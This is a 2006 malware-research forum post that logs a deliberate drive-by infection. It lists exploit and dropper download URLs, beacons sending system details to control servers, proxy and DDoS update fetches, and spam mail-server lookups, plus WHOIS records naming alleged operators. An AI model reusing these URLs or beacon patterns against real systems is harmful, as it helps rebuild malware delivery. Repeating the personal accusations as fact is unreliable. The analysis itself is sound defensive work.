Pragma Hijacks - SpamBot / ProxyBot
B.I.S.S. Forums > Malware Research Forum > Malware IP Research Section
Moore
=========================================
Pragma Hijacks
=========================================

:: A few details of the hijack that has been spreading ::

http://www.antionline.com/history/topic.php/272882-1.html
http://www.webhostingtalk.com/showthread.php?t=493954
http://www.antionline.com/history/topic.php/272893-1.html

==============
:: LOGS ::
==============

Do not follow any of the links posted here unless it's time to buy a new computer and you feel like destroying the one you have ..

I went over the initial hijack site a few times to try and get as many of the files as possible .. so I found that each time I got hijacked it was a little different.

I used Outpost Pro, Regrun and ProcessGuard for protection, which allowed me to maintain a controlled environment for the most part.

The last run was the full-on takeover of my PC, as I decided to turn off ProcessGuard, then suffered a system meltdown shortly after this, as the hijacks weren't fully taking until I let them have access to physical memory. Then they went crazy.. Also set Outpost to disable mode to log everything but not block.

Once the system crashed and rebooted it was all over for me.. had the NT AUTHORITY shutdown warning [easily stopped by shutdown -a], and system freezes; by the end of it the system was so slow it took 2 hrs just to get HijackThis to scan and save the log..


Finally in the end I rebooted once more, removed all registry auto-run hijacks with Regrun, set Outpost to block all network access and set ProcessGuard to block everything that prompted to execute, and began to clean up the mess.

==============

That link goes to:

HYPOTECHES.COM

QUOTE
Website Title:  404 Not Found
Server Type:  Apache/1.3.34 (Unix) PHP/4.4.2
IP Address:  207.226.170.218
IP Location:   - Beyond The Network America Inc
Blacklist Status:  Clear

Name Server: 
A.HYPOTECHES.COM
B.HYPOTECHES.COM

ICANN Registrar:  ESTDOMAINS, INC.
Created:  13-jan-2006
Expires:  13-jan-2007
Status:  ACTIVE

Registration Service Provided By: ESTDOMAINS
Contact: +372.55647646
Website: http ://www.estdomains.com -< Making money from these hijacks 

Domain Name: HYPOTECHES.COM

Registrant:
    SHUDDER GLOBAL LIMITED
    Manuel Carrera Lopez        ()
    Suites 25 and 27, Second Floor
    5 Jupiter House, Calleva Park, Reading
    Berks
    Reading,RG7 8NN
    GB
    Tel. +077.48372720

Creation Date: 13-Jan-2006
Expiration Date: 13-Jan-2007

Domain servers in listed order:
    a.hypoteches.com
    b.hypoteches.com


Administrative Contact:
    SHUDDER GLOBAL LIMITED
    Manuel Carrera Lopez        ()
    Suites 25 and 27, Second Floor
    5 Jupiter House, Calleva Park, Reading
    Berks
    Reading,RG7 8NN
    GB
    Tel. +077.48372720

Technical Contact:
    SHUDDER GLOBAL LIMITED
    Manuel Carrera Lopez        ()
    Suites 25 and 27, Second Floor
    5 Jupiter House, Calleva Park, Reading
    Berks
    Reading,RG7 8NN
    GB
    Tel. +077.48372720

Billing Contact:
    SHUDDER GLOBAL LIMITED
    Manuel Carrera Lopez        ()
    Suites 25 and 27, Second Floor
    5 Jupiter House, Calleva Park, Reading
    Berks
    Reading,RG7 8NN
    GB
    Tel. +077.48372720

Status:ACTIVE



* LegalTrademarks : PSGuard is a trademark of SHUDDER GLOBAL LIMITED


======================================

infectedkernel.com = 203.129.86.19

.www.euroiframe.com
.www.game4user.net
.www.iframestat.net
.www.infectedkernel.com
.www.spywaresoftstop.com
.www.violentcooperation.net

203.129.86.19
203.129.64.0 - 203.129.95.255
Hutchison Global Crossing Ltd.
Huchison GlobalCenter
Hong Kong
INFECTEDKERNEL.COM

QUOTE
Website Title:  403 Forbidden
Response Code:  403
Website Status:  Active
Reverse IP:  Web server hosts 6 websites
Server Type:  Apache/1.3.34 (Debian) PHP/4.4.2-1
IP Address: 203.129.86.19
IP Location:   - Hutchison Global Crossing Ltd
Blacklist Status:  Clear

Name Server: 
NS1.GAME4USER.NET
NS2.GAME4USER.NET

ICANN Registrar:  ONLINENIC, INC.
Created:  15-feb-2006
Expires:  15-feb-2007
Status:  REGISTRAR-LOCK

Registrant:
            Gledenov Den  +7.4952343434
            Gledenov Den
            cow street
            Moscow,Moscow,RUSSIAN FEDERATION 453234

Domain Name:infectedkernel.com

Record last updated at 2006-02-15 18:31:15
Record created on 2006/2/15
Record expired on 2007/2/15

Domain servers in listed order:

ns1.game4user.net           
ns2.game4user.net

Administrator:
Name-- Gledenov Den
EMail-: ()
tel --: +7.4952343434
            org: Gledenov Den
            cow street
            Moscow,Moscow,RUSSIAN FEDERATION 453234

Registration Service Provider:
           name: servera.info
           tel: +7.9262349216
            fax: +7.9262349216
            web:http ://servera.info


QUOTE
domain: GW.RU
type: CORPORATE
descr: Domain for .www.den.ru
descr: Register by .www.den.ru
descr: Hosted by .www.den.ru
nserver: ns2.den.ru.
nserver: ve.nu.
state: REGISTERED, DELEGATED
person: Den Gledenov
phone: +7 095 7987060
fax-no: +7 095 7987060
e-mail: den@den.ru


-------------------------------------------

safe link - ripe db browser page - http://amsoft.ru/cgi-bin/ripn?q=DEN-MNT-RIPN

User: DENIS J GLEDENOV
ID: dengroup
E-Mail: den@den.ru
ICQ UIN: 677827
Status: User
nic-hdl: DJG-RIPN
address: Moscow
phone: +7 095 7987060
fax-no: +7 095 7987060
e-mail: den@den.ru
e-mail: den@gledenov.ru
e-mail: den@ve.nu


QUOTE
Google, the Internet’s favorite search engine, has had a Russian interface since the spring of 2002, but not until April 3, 2004, was Google Technology finally able to register a proper Russian second-level domain name (in the .ru zone) for its search engine.

Russian Internet users who typed Google.com into the location window of their browsers were automatically redirected to Google’s mirror at www.google.com.ru. www.google.ru was being used by Avalanche, a Russian company that got the domain from Denis Gledenov, an infamous Russian cybersquatter.

At one point, Gledenov had registered several hundred .ru domain names that made use of international trademarks. For instance, if you type in Pentium.com, you’ll get redirected straight to Intel’s website, but Pentium.ru hosts a message saying the domain name is up for sale by Den Group, a company that belongs to Gledenov. Same goes for Hewlettpackard.ru and a number of other big name trademarks.


http://www.mosnews.com/feature/2004/04/15/google.shtml

==============

:: Icesword Port Monitor ::

Short list of domains I pulled from the logs so far :

4:44:08 AM game4all.biz 217.107.217.184
4:45:39 AM evko.biz 66.235.180.23
4:45:48 AM buhartes.info 216.255.187.66
4:47:07 AM magik888.ru 85.249.23.82
4:55:38 AM asdbiz.biz 85.255.117.154
5:01:51 AM .www.maxysearch.info 69.50.179.158
5:01:56 AM user5323232323235.com 206.51.226.211
5:05:36 AM maxysearch.info 69.50.179.158
5:05:44 AM .www.burgostar.info 64.62.243.55
5:07:36 AM z0rder.com 80.77.80.145
5:15:47 AM pornsearch.megabest.info 80.77.80.145
5:16:16 AM .www.ya.ru 213.180.204.8
5:16:54 AM .www.z0rder.com 80.77.80.145
5:16:59 AM bloknotik.ru 81.177.11.174
5:18:31 AM images.bloknotik.ru 81.177.10.240

--------------------------------------------------------------------------

Some of the times may be a bit out of order, I tried to group together the same files / or links, but for the most part it's in sequence. I removed a ton of duplicates so there will be some gaps in the times..

--------------------------------------------------------------------------

1st run :

3/12/2006 10:01:49 AM Internet Explorer http ://www.pragma.ru/~dch/inc/ 217.107.14.39 URL
3/12/2006 10:01:50 AM Internet Explorer GET /adv/083/new.php game4all.biz REQUEST
3/12/2006 10:01:50 AM Internet Explorer Moved Temporarily 217.107.14.39 ANSWER - 302
3/12/2006 10:01:50 AM Internet Explorer http ://game4all.biz/adv/083/new.php game4all.biz URL
3/12/2006 10:01:57 AM Internet Explorer OK game4all.biz ANSWER - 200
3/12/2006 10:01:58 AM Internet Explorer GET /adv/083/xpl.wmf game4all.biz REQUEST
3/12/2006 10:01:58 AM Internet Explorer http ://game4all.biz/adv/083/xpl.wmf game4all.biz URL
3/12/2006 10:01:58 AM Internet Explorer OK game4all.biz ANSWER - 200
3/12/2006 10:01:59 AM Internet Explorer GET /adv/083/sploit.anr game4all.biz REQUEST
3/12/2006 10:01:59 AM Internet Explorer http ://game4all.biz/adv/083/sploit.anr game4all.biz URL
3/12/2006 10:01:59 AM Internet Explorer OK game4all.biz ANSWER - 200
3/12/2006 10:02:01 AM Internet Explorer GET /adv/083/win32.exe game4all.biz REQUEST
3/12/2006 10:02:01 AM Internet Explorer http ://game4all.biz/adv/083/win32.exe game4all.biz URL
3/12/2006 10:02:01 AM Internet Explorer OK game4all.biz ANSWER - 200
3/12/2006 10:02:02 AM Internet Explorer http ://game4all.biz/adv/083/count.jar game4all.biz URL
3/12/2006 10:02:02 AM Internet Explorer OK game4all.biz ANSWER - 200
3/12/2006 10:02:02 AM Internet Explorer GET /adv/083/count.jar game4all.biz REQUEST
3/12/2006 10:02:05 AM Internet Explorer http ://game4all.biz/adv/083/win32.exe game4all.biz URL
3/12/2006 10:02:05 AM Internet Explorer GET /adv/083/win32.exe game4all.biz REQUEST
3/12/2006 10:02:06 AM Internet Explorer OK game4all.biz ANSWER - 200


202.62.226.199
81.164.37.214
80.54.187.183
68.148.208.246
69.76.227.23
64.71.167.44
69.235.55.171
200.176.111.73
64.71.167.44
217.210.252.200
83.144.106.67
193.16.239.13
61.246.253.193
88.105.165.171
69.73.103.192
216.255.179.235 - taskdir.exe - controller
81.177.3.175


64.71.167.18 - vxgame*.exe
69.50.173.166
69.50.171.172
69.50.161.106 - taskdir
69.50.184.194
69.50.179.158
.burgostar.info
.www.maxysearch.info
.www.reka-traffa.com
-

pornsearch.megabest.info
ya.ru
bloknotik.ru
images.bloknotik.info

-------------------------------------

193.16.239.13
193.16.239.0 - 193.16.239.255

VIRTUAL-NET S.C. A. KEPISTY, D. TERLECKI
Poland
Dariusz Terlecki
Virtual-Net s.c.
ul. Manifestu Lipcowego 9
25-323 Kielce
Poland


--------------------------------------------------------------------------------

:: Log details from when I got taken over ::

--------------------------------------------------------------------------------

3/12/2006 10:03:00 AM Slx.exet GET /adv/083/adload.php?a1=United%20States&a2=Type%20of%20Processor:%20PENTIUM%20PRO%20or%20PENTIUM%20II/III&a3=Windows%20version%20is%205.1&a4=Build:%202600,%20Platform%20ID:%202&a5=notoutpost&table=adv83 game4all.biz REQUEST

3/12/2006 10:03:00 AM Slx.exet http ://game4all.biz/adv/083/adload.php?a1=United%20States&a2=Type%20of%20Processor:%20PENTIUM%20PRO%20or%20PENTIUM%20II/III&a3=Windows%20version%20is%205.1&a4=Build:%202600,%20Platform%20ID:%202&a5=notoutpost&table=adv83 game4all.biz URL

3/12/2006 10:03:06 AM Lo-1378308035.exe GET /adv/083/adload.php?a1=United%20States&a2=Type%20of%20Processor:%20PENTIUM%20PRO%20or%20PENTIUM%20II/III&a3=Windows%20version%20is%205.1&a4=Build:%202600,%20Platform%20ID:%202&a5=outpost.exe&table=adv83 game4all.biz REQUEST
3/12/2006 10:03:06 AM Lo-1378308035.exe http ://game4all.biz/adv/083/adload.php?a1=United%20States&a2=Type%20of%20Processor:%20PENTIUM%20PRO%20or%20PENTIUM%20II/III&a3=Windows%20version%20is%205.1&a4=Build:%202600,%20Platform%20ID:%202&a5=outpost.exe&table=adv83 game4all.biz URL
3/12/2006 10:03:07 AM Slx.exet OK game4all.biz ANSWER - 200
3/12/2006 10:03:00 AM Slx.exet GET /adv/083/adload.php?a1=United%20States&a2=Type%20of%20Processor:%20PENTIUM%20PRO%20or%20PENTIUM%20II/III&a3=Windows%20version%20is%205.1&a4=Build:%202600,%20Platform%20ID:%202&a5=notoutpost&table=adv83 game4all.biz REQUEST
3/12/2006 10:03:00 AM Slx.exet http ://game4all.biz/adv/083/adload.php?a1=United%20States&a2=Type%20of%20Processor:%20PENTIUM%20PRO%20or%20PENTIUM%20II/III&a3=Windows%20version%20is%205.1&a4=Build:%202600,%20Platform%20ID:%202&a5=notoutpost&table=adv83 game4all.biz URL
3/12/2006 10:03:06 AM Lo-1378308035.exe GET /adv/083/adload.php?a1=United%20States&a2=Type%20of%20Processor:%20PENTIUM%20PRO%20or%20PENTIUM%20II/III&a3=Windows%20version%20is%205.1&a4=Build:%202600,%20Platform%20ID:%202&a5=outpost.exe&table=adv83 game4all.biz REQUEST
3/12/2006 10:03:06 AM Lo-1378308035.exe http ://game4all.biz/adv/083/adload.php?a1=United%20States&a2=Type%20of%20Processor:%20PENTIUM%20PRO%20or%20PENTIUM%20II/III&a3=Windows%20version%20is%205.1&a4=Build:%202600,%20Platform%20ID:%202&a5=outpost.exe&table=adv83 game4all.biz URL
3/12/2006 10:03:07 AM Slx.exet OK game4all.biz ANSWER - 200

3/12/2006 10:07:16 AM Vxh8jkdq7.exe http ://game4all.biz/vxgame1/vxv.php game4all.biz URL
3/12/2006 10:07:16 AM Vxh8jkdq6.exe http ://game4all.biz/tool1/ztool1.exe game4all.biz URL
3/12/2006 10:07:23 AM Vxh8jkdq6.exe http ://game4all.biz/tool1/ztool2.exe game4all.biz URL
3/12/2006 10:07:24 AM Vxh8jkdq6.exe http ://game4all.biz/tool1/ztool3.exe game4all.biz URL
3/12/2006 10:07:28 AM Vxh8jkdq6.exe http ://game4all.biz/tool1/ztool4.exe game4all.biz URL
3/12/2006 10:07:28 AM Vxh8jkdq7.exe http ://game4all.biz/vxgame1/zgame1.exe game4all.biz URL
3/12/2006 10:07:29 AM Vxh8jkdq7.exe http ://game4all.biz/vxgame1/zgame2.exe game4all.biz URL
3/12/2006 10:07:33 AM Vxh8jkdq7.exe http ://game4all.biz/vxgame1/zgame3.exe game4all.biz URL
3/12/2006 10:07:34 AM Vxh8jkdq7.exe http ://game4all.biz/vxgame1/zgame4.exe game4all.biz URL
3/12/2006 10:07:36 AM Vxh8jkdq7.exe http ://game4all.biz/vxgame1/zgame5.exe game4all.biz URL
3/12/2006 10:07:37 AM T.inx http ://game4all.biz/adv/083/adload.php?a1=United%20States&a2=Type%20of%20Processor:%20PENTIUM%20PRO%20or%20PENTIUM%20II/III&a3=Windows%20version%20is%205.1&a4=Build:%202600,%20Platform%20ID:%202&a5=outpost.exe&table=adv83 game4all.biz URL
3/12/2006 10:09:21 AM Generic Host Process for Win32 Services http ://72.36.244.185/cgi-bin/50/in/counter.pl?id=4fc0805e 72.36.244.185 URL
3/12/2006 10:09:23 AM Generic Host Process for Win32 Services http ://72.36.244.185/50/nt1.jpg 72.36.244.185 URL
3/12/2006 10:09:45 AM Vxgamet2.exe http ://81.177.3.175/cntr.php?a=8130734&b=2363&c=1252&d=5 81.177.3.175 URL
3/12/2006 10:09:55 AM Vxgamet1.exe http ://evko.biz/dl.php?code1=HUQ0&code2=1808 evko.biz URL
3/12/2006 10:09:56 AM Vxgame3.exe http ://buhartes.info/affcgi/try.fcgi?20004 buhartes.info URL
3/12/2006 10:09:57 AM Vxgamet1.exe http ://magik888.ru/t10.exe magik888.ru URL
3/12/2006 10:09:59 AM Vxgamet1.exe http ://asdbiz.biz/qwerty.exe asdbiz.biz URL
3/12/2006 10:10:01 AM Vxgamet1.exe http ://evko.biz/soft/3.exe/ evko.biz URL
3/12/2006 10:10:19 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/upd/white.txt 85.255.117.157 URL
3/12/2006 10:10:25 AM Services.exe http ://buhartes.info/gallery20004/xpsystem/rxs.ini.php buhartes.info URL
3/12/2006 10:10:26 AM Services.exe http ://buhartes.info/gallery20004/xpsystem/cmd/3.02.00.dll buhartes.info URL
3/12/2006 10:10:26 AM Services.exe http ://buhartes.info/gallery20004/xpsystem/dll.php?f=3.02.00.dll buhartes.info URL
3/12/2006 10:10:28 AM Services.exe http ://buhartes.info/mm.exe buhartes.info URL
3/12/2006 10:10:28 AM Vxgamet2.exe http ://81.177.3.175/cntr.php?a=8130734&b=2757:&c=16469&d=5 81.177.3.175 URL
3/12/2006 10:10:29 AM Qvxgamet2.exe http ://magik888.ru/ntraf11.dat magik888.ru URL
3/12/2006 10:10:30 AM Vxgamet1.exe http ://evko.biz/dl.php?code1=HNQC&code2=1108 evko.biz URL
3/12/2006 10:10:31 AM Vxgamet1.exe http ://magik888.ru/t10.exe magik888.ru URL
3/12/2006 10:10:39 AM Generic Host Process for Win32 Services http ://www.microsoft.com/ 207.46.225.60 URL
3/12/2006 10:10:45 AM Mm5.exe http ://wm.buhartes.info/cgi-bin5/repeaterm.fcgi?n=1&lastid=&rand=%202.55297031253576E-0002 buhartes.info URL
3/12/2006 10:10:45 AM Dmx3b.tmp http ://alfaportal.com/c/l/109.0.51WP2600 69.31.85.154 URL
3/12/2006 10:10:45 AM Qvxgamet2.exe http ://magik888.ru/ntraf11.dat magik888.ru URL
3/12/2006 10:11:06 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=27935&id=1338015838&ver=0004&con=L&speed=1 85.255.117.157 URL
3/12/2006 10:11:07 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=47379&id=1338015838&ver=0004&con=L&speed=1 85.255.117.157 URL
3/12/2006 10:11:09 AM Generic Host Process for Win32 Services http ://proxy4u.ws/index.php?IP=192.168.13.132&Port1=0&Port2=0&ID=4fc0805e&Ver=0050&con=&speed=1 61.152.108.11 URL
3/12/2006 10:11:14 AM Generic Host Process for Win32 Services http ://72.36.244.185/50/nt3.jpg 72.36.244.185 URL
3/12/2006 10:11:17 AM Generic Host Process for Win32 Services http ://infectedkernel.com/synctl/upd/upd.txt 203.129.86.19 URL
3/12/2006 10:11:22 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=45318&id=1338015838&ver=0004&con=L&speed=3 85.255.117.157 URL
3/12/2006 10:11:23 AM Generic Host Process for Win32 Services http ://72.36.244.185/cgi-bin/50/out/counter.pl?id=4fc0805e 72.36.244.185 URL
3/12/2006 10:11:46 AM Windows NT Logon Application http ://jupitersatellites.biz/newbot88/access.php?rand=65065 jupitersatellites.biz URL
3/12/2006 10:11:47 AM Windows NT Logon Application http ://jupitersatellites.biz/newbot88/r.php?i=1&s=2000&o=0&c=13&v=61&h=0&l=140931&a=0&ip=&win=Pl_2|Major_5|Minor_1|Build_2600|CSDV_Service_Pack_1&un=4167512075&rand=77048 jupitersatellites.biz URL
3/12/2006 10:23:38 AM Windows NT Logon Application http ://jupitersatellites.biz/newbot88/access.php?rand=70810 jupitersatellites.biz URL
3/12/2006 10:23:38 AM Windows NT Logon Application http ://jupitersatellites.biz/newbot88/r.php?i=1&s=2000&o=12786660706&c=13&v=61&h=0&l=141643&a=111&ip=&win=Pl_2|Major_5|Minor_1|Build_2600|CSDV_Service_Pack_1&un=4167512075&rand=55750 jupitersatellites.biz URL
3/12/2006 10:24:16 AM Generic Host Process for Win32 Services http ://proxy4u.ws/index.php?IP=192.168.13.132&Port1=17048&Port2=54370&ID=4fc0805e&Ver=0050&con=L&speed=7 61.152.108.11 URL
3/12/2006 10:28:17 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/upd/white.txt 85.255.117.157 URL
3/12/2006 10:28:26 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=27935&id=1338015838&ver=0004&con=L&speed=5 85.255.117.157 URL
3/12/2006 10:28:26 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=47379&id=1338015838&ver=0004&con=L&speed=5 85.255.117.157 URL
3/12/2006 10:28:26 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/loader.pl 85.255.117.157 URL
3/12/2006 10:28:30 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/upd/ddos.txt 85.255.117.157 URL
3/12/2006 10:28:31 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=45318&id=1338015838&ver=0004&con=L&speed=5 85.255.117.157 URL
3/12/2006 10:33:39 AM Windows NT Logon Application http ://jupitersatellites.biz/newbot88/access.php?rand=20603 jupitersatellites.biz URL
3/12/2006 10:33:39 AM Windows NT Logon Application http ://jupitersatellites.biz/newbot88/r.php?i=1&s=2000&o=12786660706&c=13&v=61&h=0&l=142244&a=24&ip=&win=Pl_2|Major_5|Minor_1|Build_2600|CSDV_Service_Pack_1&un=4167512075&rand=68108 jupitersatellites.biz URL
3/12/2006 10:34:20 AM Generic Host Process for Win32 Services http ://proxy4u.ws/index.php?IP=192.168.13.132&Port1=17048&Port2=54370&ID=4fc0805e&Ver=0050&con=L&speed=5 61.152.108.11 URL
3/12/2006 10:42:59 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=45318&id=1338015838&ver=0004&con=L&speed=5 85.255.117.157 URL
3/12/2006 10:43:00 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=47379&id=1338015838&ver=0004&con=L&speed=7 85.255.117.157 URL
3/12/2006 10:43:00 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=27935&id=1338015838&ver=0004&con=L&speed=5 85.255.117.157 URL
3/12/2006 10:43:03 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/upd/ddos.txt 85.255.117.157 URL
3/12/2006 10:44:32 AM Generic Host Process for Win32 Services http ://proxy4u.ws/index.php?IP=192.168.13.132&Port1=17048&Port2=54370&ID=4fc0805e&Ver=0050&con=L&speed=5 61.152.108.11 URL
3/12/2006 10:54:42 AM Generic Host Process for Win32 Services http ://proxy4u.ws/index.php?IP=192.168.13.132&Port1=17048&Port2=54370&ID=4fc0805e&Ver=0050&con=L&speed=7 61.152.108.11 URL
3/12/2006 10:57:19 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=47379&id=1338015838&ver=0004&con=L&speed=7 85.255.117.157 URL
3/12/2006 11:07:20 AM Windows Explorer http ://asdbiz.biz/soft/softadmin.php?action=get_update&ver=v0.005&id={BB7CB5AC-1F58-4A6F-8A1A-32C7453330FB} asdbiz.biz URL
3/12/2006 11:07:20 AM Windows Explorer http ://asdbiz.biz/soft/softadmin.php?action=register&ver=v0.005&id={BB7CB5AC-1F58-4A6F-8A1A-32C7453330FB} asdbiz.biz URL
3/12/2006 11:07:21 AM Windows Explorer http ://z0rder.com/ssoft/softadmin.php?action=register&ver=v0.005&id={BB7CB5AC-1F58-4A6F-8A1A-32C7453330FB} z0rder.com URL
3/12/2006 11:07:21 AM Windows Explorer http ://asdbiz.biz/soft/softadmin.php?action=get_2execute&ver=v0.005&id={BB7CB5AC-1F58-4A6F-8A1A-32C7453330FB} asdbiz.biz URL
3/12/2006 11:07:26 AM Windows Explorer http ://www.google.com/?q=Αθλΰιν www.google.com URL
3/12/2006 11:10:08 AM Generic Host Process for Win32 Services http ://proxy4u.ws:8080/update2.htm 61.152.108.11 URL
3/12/2006 11:10:14 AM Generic Host Process for Win32 Services http ://infectedkernel.com/synctl/upd/upd.txt 203.129.86.19 URL
3/12/2006 11:12:18 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=47379&id=1338015838&ver=0004&con=L&speed=4 85.255.117.157 URL
3/12/2006 11:12:19 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=27935&id=1338015838&ver=0004&con=L&speed=4 85.255.117.157 URL
3/12/2006 11:15:41 AM Generic Host Process for Win32 Services http ://proxy4u.ws/index.php?IP=192.168.13.132&Port1=17048&Port2=54370&ID=4fc0805e&Ver=0050&con=L&speed=5 61.152.108.11 URL
3/12/2006 12:33:08 PM Internet Explorer http ://pornsearch.megabest.info/search.php?q=anal+toys&mode=1 z0rder.com URL - LOL I didn't search for that!!!


==========================

Fully taken over, I was sending out a lot of traffic ... blocked by the host firewall

===========================

:: DNS CACHE SPAMBOT LOG ::

===========================

10:01:49 AM www.pragma.ru 217.107.14.39
10:01:50 AM game4all.biz 217.107.217.184
10:09:37 AM update.windows-center.net 216.195.47.194
10:09:53 AM evko.biz 66.235.180.23
10:09:55 AM buhartes.info 216.255.187.66
10:09:57 AM magik888.ru 85.249.23.82
10:10:45 AM alfaportal.com 69.31.85.154
10:10:45 AM wm.buhartes.info 216.255.187.66
10:10:46 AM mx4.mail.yahoo.com 66.218.86.156, 66.218.86.253, 66.218.86.254
10:10:46 AM mx1.hotmail.com 65.54.244.136, 65.54.245.8, 64.4.50.50, 65.54.244.8
10:10:47 AM mx1.mail.yahoo.com 67.28.113.11, 67.28.113.71, 4.79.181.14, 4.79.181.15
10:10:48 AM mx3.hotmail.com 65.54.244.72, 65.54.244.200, 65.54.245.72, 64.4.50.179
10:10:49 AM mx4.hotmail.com 65.54.190.179, 65.54.244.104, 65.54.244.232, 65.54.245.104
10:10:49 AM mx.central.cox.net 70.168.47.164
10:10:51 AM sbcmx4.prodigy.net 207.115.57.18
10:10:53 AM mx2.hotmail.com 65.54.245.40, 65.54.190.50, 65.54.244.40, 65.54.244.168
10:10:53 AM mx2.mail.yahoo.com 67.28.113.70, 4.79.181.134, 4.79.181.135, 67.28.113.19
10:10:53 AM mprdmxin.myway.com 208.45.133.151
10:10:54 AM mail.telia.com 81.228.11.160, 81.228.8.84, 81.228.8.85, 81.228.8.165, 81.228.11.99, 81.228.11.100
10:10:59 AM mx3.mail.yahoo.com 67.28.113.10, 4.79.181.12, 4.79.181.13, 64.156.215.8, 64.156.215.18
10:11:00 AM xmxpita.excite.com 208.45.133.107
10:11:00 AM sbcmx1.prodigy.net 207.115.57.15
10:11:00 AM mailin-03.mx.aol.com 64.12.138.120, 205.188.157.217, 205.188.159.57, 64.12.138.57
10:11:00 AM mail-com.mr.outblaze.com 64.71.166.199, 205.158.62.33, 208.36.123.68, 64.71.166.194, 64.71.166.196, 64.71.166.197
10:11:01 AM mailin-01.mx.aol.com 64.12.137.249, 205.188.156.185, 205.188.158.121
10:11:01 AM gateway-r.comcast.net 216.148.227.126, 204.127.198.26
10:11:01 AM mailin-04.mx.aol.com 205.188.159.217, 64.12.138.89, 64.12.138.152, 205.188.156.249
10:11:02 AM mail.optusnet.com.au 211.29.132.250
10:11:04 AM mailin-01.mx.netscape.net 205.188.158.25
10:11:05 AM mx00.mail.bellsouth.net 205.152.58.32
10:11:05 AM corderoatado.arnet.com.ar 200.45.191.163
10:11:05 AM mxs.mail.ru 194.67.23.20
10:11:05 AM blackplanet-com-bk.mr.outblaze.com 208.36.123.58, 64.71.166.195, 64.71.166.198, 64.71.166.202
10:11:06 AM smtp.wanadoo.fr 193.252.22.83, 193.252.22.89, 193.252.22.92, 193.252.22.107, 193.252.22.110, 193.252.22.116, 193.252.22.123, 193.252.23.67, 193.252.23.110, 193.252.22.56, 193.252.22.65, 193.252.22.78, 193.252.22.79, 193.252.22.80, 193.252.22.81, 193.252.22.82
10:11:06 AM mailin01.sul.t-online.de 194.25.134.72
10:11:07 AM mx.organizer.net 194.24.253.71
10:11:08 AM mx.frontiernet.net 66.133.129.70
10:11:08 AM dialmaine.com.mail1.psmtp.com 64.18.4.10
10:11:09 AM smtp1.inicia.es 212.166.64.67
10:11:09 AM mx.noos.fr 194.117.218.78
10:11:09 AM proxy4u.ws 61.152.108.11
10:11:10 AM mx2.mail.ukl.yahoo.com 217.12.11.64
10:11:11 AM mx00.schlund.de 212.227.15.134, 212.227.15.150, 212.227.15.169, 212.227.15.186
10:11:12 AM mail2.e-mail.dk 212.112.128.249
10:11:12 AM mailin.rzone.de 81.169.145.100
10:11:14 AM mail.citykom.de 195.202.32.24, 195.202.32.22
10:11:14 AM hrndva-02.mgw.rr.com 24.28.204.36, 24.28.204.37, 24.28.204.27, 24.28.204.28, 24.28.204.29, 24.28.204.30, 24.28.204.35
10:11:14 AM mx0.gmx.net 213.165.64.100
10:11:15 AM mx-ha01.web.de 217.72.192.149
10:11:15 AM infectedkernel.com 203.129.86.19
10:11:17 AM bender.weihenstephan.org 62.245.246.226
10:11:18 AM nullmx.mns.com 127.0.0.1
10:11:18 AM sbcmx3.prodigy.net 207.115.57.17
10:11:19 AM mailin00.sul.t-online.de 194.25.134.8
10:11:21 AM mx3.earthlink.net 209.86.93.228
10:11:22 AM leeds.sin1.netline.net.uk 213.40.2.10, 213.40.2.11, 213.40.2.12
10:11:22 AM mailin02.sul.t-online.de 194.25.134.9
10:11:22 AM mx5.mail.yahoo.co.jp 202.93.83.236


=============================================


3/12/2006 2:14:30 PM svchost.exe IN TCP 216.195.47.194 2506 Allow All Activity
3/12/2006 2:08:10 PM winlogon.exe OUT TCP jupitersatellites.biz http Undefined Rule
3/12/2006 2:08:10 PM winlogon.exe OUT UDP localhost 1025 Undefined Rule
3/12/2006 11:41:08 AM svchost.exe OUT TCP 85.255.117.157 http Allow All Activity
3/12/2006 11:40:59 AM svchost.exe OUT TCP 207.46.20.60 http Allow All Activity
3/12/2006 11:36:10 AM svchost.exe OUT TCP 61.152.108.11 http Allow All Activity
3/12/2006 11:25:48 AM svchost.exe OUT TCP 207.46.199.30 http Allow All Activity
3/12/2006 11:21:31 AM svchost.exe OUT TCP 216.195.47.194 smtp Allow All Activity
3/12/2006 11:11:00 AM svchost.exe OUT TCP 203.129.86.19 http Allow All Activity
3/12/2006 11:10:52 AM svchost.exe OUT TCP 216.35.187.247 proxy:8080 Allow All Activity
3/12/2006 11:10:29 AM svchost.exe OUT TCP 61.152.108.11 proxy:8080 Allow All Activity
3/12/2006 11:09:24 AM svchost.exe OUT TCP 216.195.47.194 smtp Allow All Activity
3/12/2006 11:04:44 AM svchost.exe OUT TCP 207.46.199.60 http Allow All Activity
3/12/2006 10:57:15 AM svchost.exe OUT TCP 207.46.199.30 http Allow All Activity
3/12/2006 10:11:23 AM svchost.exe OUT TCP 72.36.244.185 http Disable Mode
3/12/2006 10:11:15 AM svchost.exe OUT TCP 207.46.20.30 http Disable Mode
3/12/2006 11:07:26 AM explorer.exe OUT TCP z0rder.com http Allow All Activity
3/12/2006 11:07:20 AM explorer.exe OUT TCP asdbiz.biz http Allow All Activity
3/12/2006 10:33:39 AM winlogon.exe OUT TCP jupitersatellites.biz http Disable Mode
3/12/2006 10:11:23 AM mm5.exe OUT TCP 213.40.2.10 smtp Disable Mode
